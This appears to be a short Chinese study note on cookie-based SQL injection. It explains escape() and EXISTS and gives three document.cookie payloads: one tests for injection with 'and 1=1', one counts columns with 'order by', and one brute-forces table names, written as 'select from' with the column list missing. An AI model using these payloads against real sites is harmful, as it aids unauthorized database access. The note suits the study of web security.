escape :对内容进行编码
exists :判断是否存在(检测语句执行的结果是否存在存在回显正常,没有则回显错误)
document.cookie=”id=”+escape(“105 and 1=1”) 或者 1=2 #判断是否存在注入
document.cookie=”id=”+escape(“105 order by 26”) #判断字段数
document.cookie=”id=”+escape(“105 and exists(select from 表名字)”) #可以对表名字段名进行爆破。
查看字段的长度可以看出来